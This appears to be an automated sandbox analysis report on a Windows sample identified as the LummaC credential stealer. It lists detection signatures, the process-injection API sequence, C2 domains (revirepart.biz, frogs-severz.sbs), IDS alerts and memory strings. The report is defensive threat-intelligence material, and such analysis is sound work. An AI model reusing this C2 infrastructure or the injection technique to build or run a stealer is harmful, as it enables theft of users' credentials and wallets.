Edit tour

Windows Analysis Report
b.exe

Overview

General Information

Sample name:	b.exe
Analysis ID:	1561391
MD5:	1d08526fc81b1d62195f4e5dea52bb6f
SHA1:	caeaa9d75af4555ecc6367dd32cd541123c5e5b6
SHA256:	5af91198860f878466493a6d92481fcc88d59a182cec02812ce6b3dcd1f0fa38
Tags:	exeuser-4k95m
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has nameless sections

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

b.exe (PID: 7648 cmdline: "C:\Users\user\Desktop\b.exe" MD5: 1D08526FC81B1D62195F4E5DEA52BB6F)

conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

aspnet_regiis.exe (PID: 7728 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)

WerFault.exe (PID: 7840 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7648 -s 1228 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["revirepart.biz"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
Process Memory Space: b.exe PID: 7648	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 7728	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 7728	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T10:25:01.670163+0100	2028371	3	Unknown Traffic	192.168.2.4	49730	104.21.43.198	443	TCP
2024-11-23T10:25:03.908693+0100	2028371	3	Unknown Traffic	192.168.2.4	49732	104.21.88.250	443	TCP
2024-11-23T10:25:05.901261+0100	2028371	3	Unknown Traffic	192.168.2.4	49734	104.21.88.250	443	TCP
2024-11-23T10:25:08.400820+0100	2028371	3	Unknown Traffic	192.168.2.4	49737	104.21.88.250	443	TCP
2024-11-23T10:25:11.575585+0100	2028371	3	Unknown Traffic	192.168.2.4	49740	104.21.88.250	443	TCP
2024-11-23T10:25:13.846176+0100	2028371	3	Unknown Traffic	192.168.2.4	49742	104.21.88.250	443	TCP
2024-11-23T10:25:16.603881+0100	2028371	3	Unknown Traffic	192.168.2.4	49744	104.21.88.250	443	TCP
2024-11-23T10:25:18.738157+0100	2028371	3	Unknown Traffic	192.168.2.4	49747	104.21.88.250	443	TCP
2024-11-23T10:25:21.447907+0100	2028371	3	Unknown Traffic	192.168.2.4	49749	104.21.88.250	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T10:25:02.355799+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49730	104.21.43.198	443	TCP
2024-11-23T10:25:04.617752+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49732	104.21.88.250	443	TCP
2024-11-23T10:25:06.597888+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49734	104.21.88.250	443	TCP
2024-11-23T10:25:22.151291+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49749	104.21.88.250	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T10:25:02.355799+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49730	104.21.43.198	443	TCP
2024-11-23T10:25:04.617752+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49732	104.21.88.250	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T10:25:06.597888+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49734	104.21.88.250	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (revirepart .biz in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T10:25:01.670163+0100	2057647	1	Domain Observed Used for C2 Detected	192.168.2.4	49730	104.21.43.198	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (revirepart .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T10:25:00.042087+0100	2057646	1	Domain Observed Used for C2 Detected	192.168.2.4	56745	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T10:25:20.152926+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49747	104.21.88.250	443	TCP

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: revirepart.biz

Source: aspnet_regiis.exe, 00000002.00000003.1826876989.0000000004DDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: aspnet_regiis.exe, 00000002.00000003.1826876989.0000000004DDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: aspnet_regiis.exe, 00000002.00000003.1826876989.0000000004DDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: aspnet_regiis.exe, 00000002.00000003.1826876989.0000000004DDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: aspnet_regiis.exe, 00000002.00000003.1826876989.0000000004DDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: aspnet_regiis.exe, 00000002.00000003.1826876989.0000000004DDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: aspnet_regiis.exe, 00000002.00000003.1826876989.0000000004DDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: aspnet_regiis.exe, 00000002.00000003.1826876989.0000000004DDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: aspnet_regiis.exe, 00000002.00000003.1826876989.0000000004DDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Amcache.hve.5.dr	String found in binary or memory: http://upx.sf.net
Source: aspnet_regiis.exe, 00000002.00000003.1826876989.0000000004DDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: aspnet_regiis.exe, 00000002.00000003.1826876989.0000000004DDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: aspnet_regiis.exe, 00000002.00000003.1772346046.0000000004DEA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1772515435.0000000004DE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: aspnet_regiis.exe, 00000002.00000003.1772346046.0000000004DEA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1772515435.0000000004DE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: aspnet_regiis.exe, 00000002.00000003.1772346046.0000000004DEA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1772515435.0000000004DE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: aspnet_regiis.exe, 00000002.00000003.1772346046.0000000004DEA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1772515435.0000000004DE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: aspnet_regiis.exe, 00000002.00000003.1772346046.0000000004DEA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1772515435.0000000004DE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: aspnet_regiis.exe, 00000002.00000003.1772346046.0000000004DEA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1772515435.0000000004DE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: aspnet_regiis.exe, 00000002.00000003.1772346046.0000000004DEA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1772515435.0000000004DE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: aspnet_regiis.exe, 00000002.00000002.1925207846.0000000002927000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1804693049.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1804839414.0000000004DA7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1770809655.0000000002937000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1904340370.0000000002927000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1804566888.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://frogs-severz.sbs/
Source: aspnet_regiis.exe, 00000002.00000003.1904374794.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1850397648.0000000004DAA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1877041878.0000000004DA5000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1925594302.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1924472463.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1850064966.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://frogs-severz.sbs/.
Source: aspnet_regiis.exe, 00000002.00000003.1904374794.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1877041878.0000000004DA5000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1925594302.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1924472463.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://frogs-severz.sbs/J
Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000002.00000002.1925078989.00000000028CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1924361265.00000000028CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1925302467.000000000294F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1876536133.000000000294F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1826478661.0000000002947000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1826429538.0000000002943000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1850347979.0000000002943000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1771257369.0000000002910000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1850417159.0000000002947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogs-severz.sbs/api
Source: aspnet_regiis.exe, 00000002.00000003.1876536133.000000000294F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogs-severz.sbs/api$
Source: aspnet_regiis.exe, 00000002.00000002.1925302467.000000000294F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogs-severz.sbs/api8
Source: aspnet_regiis.exe, 00000002.00000003.1904374794.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://frogs-severz.sbs/api;
Source: aspnet_regiis.exe, 00000002.00000002.1925302467.000000000294F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogs-severz.sbs/apibu
Source: aspnet_regiis.exe, 00000002.00000003.1826478661.0000000002947000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1826429538.0000000002943000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogs-severz.sbs/apie
Source: aspnet_regiis.exe, 00000002.00000003.1904374794.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1826659361.0000000004DA8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1850397648.0000000004DAA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1877041878.0000000004DA5000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1925594302.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1924472463.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1827760791.0000000004DA8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1850064966.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://frogs-severz.sbs/pp
Source: aspnet_regiis.exe, 00000002.00000003.1924361265.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1925078989.00000000028B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogs-severz.sbs:443/api
Source: aspnet_regiis.exe, 00000002.00000003.1924361265.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1925078989.00000000028B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogs-severz.sbs:443/apicuriz
Source: aspnet_regiis.exe, 00000002.00000003.1726420977.00000000028E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://revirepart.biz/
Source: aspnet_regiis.exe, 00000002.00000003.1773452170.0000000004E44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: aspnet_regiis.exe, 00000002.00000003.1827823872.0000000004EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: aspnet_regiis.exe, 00000002.00000003.1827823872.0000000004EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: aspnet_regiis.exe, 00000002.00000003.1773452170.0000000004E42000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1804527241.0000000004DF6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1773613824.0000000004DF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: aspnet_regiis.exe, 00000002.00000003.1773613824.0000000004DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: aspnet_regiis.exe, 00000002.00000003.1773452170.0000000004E42000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1804527241.0000000004DF6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1773613824.0000000004DF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: aspnet_regiis.exe, 00000002.00000003.1773613824.0000000004DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: aspnet_regiis.exe, 00000002.00000003.1772346046.0000000004DEA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1772515435.0000000004DE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: aspnet_regiis.exe, 00000002.00000003.1772346046.0000000004DEA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1772515435.0000000004DE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: aspnet_regiis.exe, 00000002.00000003.1827823872.0000000004EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: aspnet_regiis.exe, 00000002.00000003.1827823872.0000000004EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: aspnet_regiis.exe, 00000002.00000003.1827823872.0000000004EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: aspnet_regiis.exe, 00000002.00000003.1827823872.0000000004EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: aspnet_regiis.exe, 00000002.00000003.1827823872.0000000004EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: unknown	HTTPS traffic detected: 104.21.43.198:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49749 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_02475300 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

2_2_02475300

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_02475300 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

2_2_02475300

System Summary

PE file contains section with special chars

Source: b.exe

Static PE information: section name: m@ka

PE file has nameless sections

Source: b.exe

Static PE information: section name:

Source: C:\Users\user\Desktop\b.exe	Code function: 0_2_6CDD88C0 WindowsHandle,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,NtGetContextThread,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtSetContextThread,NtResumeThread,CloseHandle,CloseHandle,GetConsoleWindow,ShowWindow,VirtualAlloc,NtGetContextThread,CloseHandle,CreateProcessW,NtWriteVirtualMemory,NtWriteVirtualMemory,CloseHandle,		0_2_6CDD88C0
Source: C:\Users\user\Desktop\b.exe	Code function: 0_2_6CDD6E40 GetModuleHandleW,NtQueryInformationProcess,GetModuleHandleW,		0_2_6CDD6E40

Source: C:\Users\user\Desktop\b.exe	Code function: 0_2_008BBC80	0_2_008BBC80
Source: C:\Users\user\Desktop\b.exe	Code function: 0_2_008A3090	0_2_008A3090
Source: C:\Users\user\Desktop\b.exe	Code function: 0_2_008A2430	0_2_008A2430
Source: C:\Users\user\Desktop\b.exe	Code function: 0_2_008A41A0	0_2_008A41A0
Source: C:\Users\user\Desktop\b.exe	Code function: 0_2_008BC5A0	0_2_008BC5A0
Source: C:\Users\user\Desktop\b.exe	Code function: 0_2_008BC920	0_2_008BC920
Source: C:\Users\user\Desktop\b.exe	Code function: 0_2_008BF550	0_2_008BF550
Source: C:\Users\user\Desktop\b.exe	Code function: 0_2_6CDD88C0	0_2_6CDD88C0
Source: C:\Users\user\Desktop\b.exe	Code function: 0_2_6CDD6E40	0_2_6CDD6E40
Source: C:\Users\user\Desktop\b.exe	Code function: 0_2_6CDD1210	0_2_6CDD1210
Source: C:\Users\user\Desktop\b.exe	Code function: 0_2_6CDDFCB0	0_2_6CDDFCB0
Source: C:\Users\user\Desktop\b.exe	Code function: 0_2_6CDD4810	0_2_6CDD4810
Source: C:\Users\user\Desktop\b.exe	Code function: 0_2_6CDEA621	0_2_6CDEA621
Source: C:\Users\user\Desktop\b.exe	Code function: 0_2_6CDD7FE0	0_2_6CDD7FE0
Source: C:\Users\user\Desktop\b.exe	Code function: 0_2_008BDA10	0_2_008BDA10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0247D260	2_2_0247D260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02449AE0	2_2_02449AE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0247AAE0	2_2_0247AAE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0246F3ED	2_2_0246F3ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0246E398	2_2_0246E398
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02469060	2_2_02469060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02464860	2_2_02464860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_024590D0	2_2_024590D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02462110	2_2_02462110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02466618	2_2_02466618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0247A760	2_2_0247A760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02482C40	2_2_02482C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02448C70	2_2_02448C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0245A4DA	2_2_0245A4DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0244AD50	2_2_0244AD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02483580	2_2_02483580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02465A4A	2_2_02465A4A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02461250	2_2_02461250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02483260	2_2_02483260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02446200	2_2_02446200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02444A31	2_2_02444A31
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0247DAC0	2_2_0247DAC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0247E2D0	2_2_0247E2D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0245E2F0	2_2_0245E2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_024732F0	2_2_024732F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0244B280	2_2_0244B280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02478B4C	2_2_02478B4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02462360	2_2_02462360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02442B70	2_2_02442B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0245EFF5	2_2_0245EFF5
